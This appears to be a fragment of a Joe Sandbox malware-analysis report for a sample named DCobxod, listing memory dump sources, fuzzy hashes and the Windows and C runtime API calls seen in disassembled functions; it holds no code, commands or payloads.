                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba722676bae005311b3e220c79aef38daec0cd13c460f6075ea660d04118d5f1
                                                              • Instruction ID: 7d51dd32365a203ced7b563c067816da517eddfe459e8305c53a4b06f262fd2d
                                                              • Opcode Fuzzy Hash: ba722676bae005311b3e220c79aef38daec0cd13c460f6075ea660d04118d5f1
                                                              • Instruction Fuzzy Hash: 6112E3B17087169FC718CF28D590A79B7E0FF95308F50892EE996C7780D338A595CB49
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0014856a881881dd3c0ced6db7da0f18fbf4834310a1ef4ea24856050e47d5c2
                                                              • Instruction ID: ac4bb9b44d8a2f965546b3fd98926dcf457aa0b2f34addad55c92faa75584abf
                                                              • Opcode Fuzzy Hash: 0014856a881881dd3c0ced6db7da0f18fbf4834310a1ef4ea24856050e47d5c2
                                                              • Instruction Fuzzy Hash: 4CF1CD716883418FC714CF29C9C46AABBE1EF8A318F155A2FF4C587351D638D985CB4A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 929c11dc2f730581010686ac2b8193bd9725b9319d3d9173ce335aab4f4cf554
                                                              • Instruction ID: e5c07f4713186da1d78e6faf2471e63148aad8865e4cbb7a3960a118177741a6
                                                              • Opcode Fuzzy Hash: 929c11dc2f730581010686ac2b8193bd9725b9319d3d9173ce335aab4f4cf554
                                                              • Instruction Fuzzy Hash: 78D1C3B17083548FCB14CF29D94075BBBE1BF89308F45456EE8899B342D778E909CB5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c7e7a00fb1ec0088e4be950ace9388f33bcff950bdea311ae97bf0a27d79a718
                                                              • Instruction ID: b34bc01f42680d98f8b985ce21339a4980182356111615fa6aa720e224f2ecb1
                                                              • Opcode Fuzzy Hash: c7e7a00fb1ec0088e4be950ace9388f33bcff950bdea311ae97bf0a27d79a718
                                                              • Instruction Fuzzy Hash: 3BE15D755083948FD344CF29D89046BBFF0AF9A301F86096EF9C497392C235EA19DB96
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                              • Instruction ID: 3d7ffd143cdae1b9b187befe1e34e49110ea431d9f8c1e260e62d4ab05545c26
                                                              • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                              • Instruction Fuzzy Hash: D0918AB03003558BDB24EE65E894BFA77D4EBD0308F90092FF986C7281DA7C9595C35A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction ID: e6c140a3a4db22094a86635f16844dc70d2571e6bd4221e120ef6eb5bc9802a5
                                                              • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction Fuzzy Hash: 9B8130713043555BDB25EE54E890BBE37D4EBD1308F80492FEAC68B282DA7C89C5875E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • Opcode ID: d992aca750face3608d05b29ddd4791024a326d65373f89e3b6922cde5947ed9
                                                              • Instruction ID: 160033748631492e86b048189d051fc1d84c8bfdd8653dbcc94a4317892d8562
                                                              • Opcode Fuzzy Hash: d992aca750face3608d05b29ddd4791024a326d65373f89e3b6922cde5947ed9
                                                              • Instruction Fuzzy Hash: 84619931600F0856DA38AA68A891BBF6394EB5D344F14395FEC43DF381D69DED428A4E
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
• Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                              • Instruction ID: 6d55780e9fa2d493e2e69dd2436257af6193529c31e4d7945b17f50a7baf4a6a
                                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                              • Instruction Fuzzy Hash: 9E513560604E4457DF3855288556BFF63E59B4E344F18381BE882CB382C60EEE4687AE
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
• Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • Opcode ID: d9f10eef400f2764a368ca0535c89874267124585d4d8141dc80ce69b7dfb517
                                                              • Instruction ID: 3a18d36a8d470bb90d02fc670585e6240ebf4d614e729072684616bd2273eaea
                                                              • Opcode Fuzzy Hash: d9f10eef400f2764a368ca0535c89874267124585d4d8141dc80ce69b7dfb517
                                                              • Instruction Fuzzy Hash: 8F51E5715083D59FD711CF35C1404AEBFE0AE9A318F4909AEE4D95B243C225DA8FCB66
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
• Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • Opcode ID: b4ab61a350d8a6dc50b6095f0f386871b14b177a810588d4149f5be78071ac35
                                                              • Instruction ID: f6dcece2e2db2e2e0d59c1f4798744cf5f13165829834fd04e9ceb58f3fba719
                                                              • Opcode Fuzzy Hash: b4ab61a350d8a6dc50b6095f0f386871b14b177a810588d4149f5be78071ac35
                                                              • Instruction Fuzzy Hash: 9551EFB1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3341D735EA59CB9A
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
• Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction ID: 8d5546d0a53b7e5b708c30fcce629f5b41d50ed942ca87f7d63edd795629f095
                                                              • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction Fuzzy Hash: 2B3115B1B147568FCB14EF29D8512AABBE0FB95305F40452EE485C7341C73CEA4ACB96
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0041E30E
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                                • Part of subcall function 00421DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00451030,00000200,0041D928,00000000,?,00000050,00451030), ref: 00421DC4
                                                              • _strlen.LIBCMT ref: 0041E32F
                                                              • SetDlgItemTextW.USER32(?,0044E274,?), ref: 0041E38F
                                                              • GetWindowRect.USER32(?,?), ref: 0041E3C9
                                                              • GetClientRect.USER32(?,?), ref: 0041E3D5
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0041E475
                                                              • GetWindowRect.USER32(?,?), ref: 0041E4A2
                                                              • SetWindowTextW.USER32(?,?), ref: 0041E4DB
                                                              • GetSystemMetrics.USER32(00000008), ref: 0041E4E3
                                                              • GetWindow.USER32(?,00000005), ref: 0041E4EE
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041E51B
                                                              • GetWindow.USER32(00000000,00000002), ref: 0041E58D
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
• Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$d$tD
                                                              • API String ID: 2407758923-3216612198
                                                              • Opcode ID: fce45456909ce546a5b10c033c2b90e929479138da22abc94d1650906dd0a3df
                                                              • Instruction ID: 72a19ed68e3932e9f5ccf7f32c65d94700d8fecd7c2fff0d50b772510562c776
                                                              • Opcode Fuzzy Hash: fce45456909ce546a5b10c033c2b90e929479138da22abc94d1650906dd0a3df
                                                              • Instruction Fuzzy Hash: D181A471604301AFD710DFA9CD85AABBBE9FBC8704F04092EFA88D7250D734E9458B56
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 0043CB66
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C71E
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C730
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C742
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C754
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C766
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C778
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C78A
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C79C
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C7AE
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C7C0
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C7D2
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C7E4
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C7F6
                                                              • _free.LIBCMT ref: 0043CB5B
                                                                • Part of subcall function 00438DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34), ref: 00438DE2
                                                                • Part of subcall function 00438DCC: GetLastError.KERNEL32(00443A34,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34,00443A34), ref: 00438DF4
                                                              • _free.LIBCMT ref: 0043CB7D
                                                              • _free.LIBCMT ref: 0043CB92
                                                              • _free.LIBCMT ref: 0043CB9D
                                                              • _free.LIBCMT ref: 0043CBBF
                                                              • _free.LIBCMT ref: 0043CBD2
                                                              • _free.LIBCMT ref: 0043CBE0
                                                              • _free.LIBCMT ref: 0043CBEB
                                                              • _free.LIBCMT ref: 0043CC23
                                                              • _free.LIBCMT ref: 0043CC2A
                                                              • _free.LIBCMT ref: 0043CC47
                                                              • _free.LIBCMT ref: 0043CC5F
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
• Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID: hD
                                                              • API String ID: 161543041-262436526
                                                              • Opcode ID: a5d40b9caad3cdec41a8b0ed7f7b32a09375fdf7e5f5d37bab312572b6625523
                                                              • Instruction ID: 23f76f1826dd0316f7119351c2db324b9e8039861a3f5847b63200f01b807288
                                                              • Opcode Fuzzy Hash: a5d40b9caad3cdec41a8b0ed7f7b32a09375fdf7e5f5d37bab312572b6625523
                                                              • Instruction Fuzzy Hash: 3A311D315003059FEB21AA3AE885B5BB7F5AF18714F14741FF558E6291DF39E840CB18
                                                              APIs
                                                              • _free.LIBCMT ref: 00439705
                                                                • Part of subcall function 00438DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34), ref: 00438DE2
                                                                • Part of subcall function 00438DCC: GetLastError.KERNEL32(00443A34,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34,00443A34), ref: 00438DF4
                                                              • _free.LIBCMT ref: 00439711
                                                              • _free.LIBCMT ref: 0043971C
                                                              • _free.LIBCMT ref: 00439727
                                                              • _free.LIBCMT ref: 00439732
                                                              • _free.LIBCMT ref: 0043973D
                                                              • _free.LIBCMT ref: 00439748
                                                              • _free.LIBCMT ref: 00439753
                                                              • _free.LIBCMT ref: 0043975E
                                                              • _free.LIBCMT ref: 0043976C
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
• Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: 0dD
                                                              • API String ID: 776569668-2869565352
                                                              • Opcode ID: 3be0604f65efa44c7263c700ec063853a29b1664a94be60055dddfc4e6a911d2
                                                              • Instruction ID: 557c86e3216c5c085d84fc1428c4712dc833ba6f2d3ca716db24c33a7f0848e7
                                                              • Opcode Fuzzy Hash: 3be0604f65efa44c7263c700ec063853a29b1664a94be60055dddfc4e6a911d2
                                                              • Instruction Fuzzy Hash: F411D776110209BFCB01EF55C842CD97B75EF28754F0160AAFA084F262DE35DE509B88
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00429736
                                                              • _wcslen.LIBCMT ref: 004297D6
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004297E5
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00429806
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0042982D
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
• Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                              • API String ID: 1777411235-4209811716
                                                              • Opcode ID: 6617356d6379e01ab399a44df48570677e04ea77c90cd75eca4a048f5239184d
                                                              • Instruction ID: 00d645727ce03a2e3df03bbd97a6350652c3f9ea69f7ebb4887c4d0bdf7644ab
                                                              • Opcode Fuzzy Hash: 6617356d6379e01ab399a44df48570677e04ea77c90cd75eca4a048f5239184d
                                                              • Instruction Fuzzy Hash: 3C313B322083217AE725AF25AC06F5B7798EF86725F14011FF501961D1EB7C9E0482AD
                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 0042D6C1
                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0042D6ED
                                                                • Part of subcall function 00421FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0041C116,00000000,.exe,?,?,00000800,?,?,?,00428E3C), ref: 00421FD1
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0042D709
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0042D720
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0042D734
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0042D75D
                                                              • DeleteObject.GDI32(00000000), ref: 0042D764
                                                              • GetWindow.USER32(00000000,00000002), ref: 0042D76D
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
• Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: f9191d222b0c2c55044e2dea1a8157d44fdaae691c10f22b530dfd56ed62d993
                                                              • Instruction ID: 8334846503c8cae2eca84c881e8b75f31bd67d594aee5bdbecf8aecaa540910a
                                                              • Opcode Fuzzy Hash: f9191d222b0c2c55044e2dea1a8157d44fdaae691c10f22b530dfd56ed62d993
                                                              • Instruction Fuzzy Hash: 431105327003607BE2206B71BC4AFAF775CAB94712F804136FA85E1191D66C8A8552AD
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 322700389-393685449
                                                              • Opcode ID: 14c6390a64f184b21b4a4860027c2300ffb924e3ea8800ab68bbe742a73b71b8
                                                              • Instruction ID: c836a9073998cbde4344fa8d30851cee90a4716c58eb0ab4e0ee9ab6f141d6d1
                                                              • Opcode Fuzzy Hash: 14c6390a64f184b21b4a4860027c2300ffb924e3ea8800ab68bbe742a73b71b8
                                                              • Instruction Fuzzy Hash: 82B18A31800209EFCF28EFA5C9819AFBBB5BF08315F14515BE8016B312C779DA51CB99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
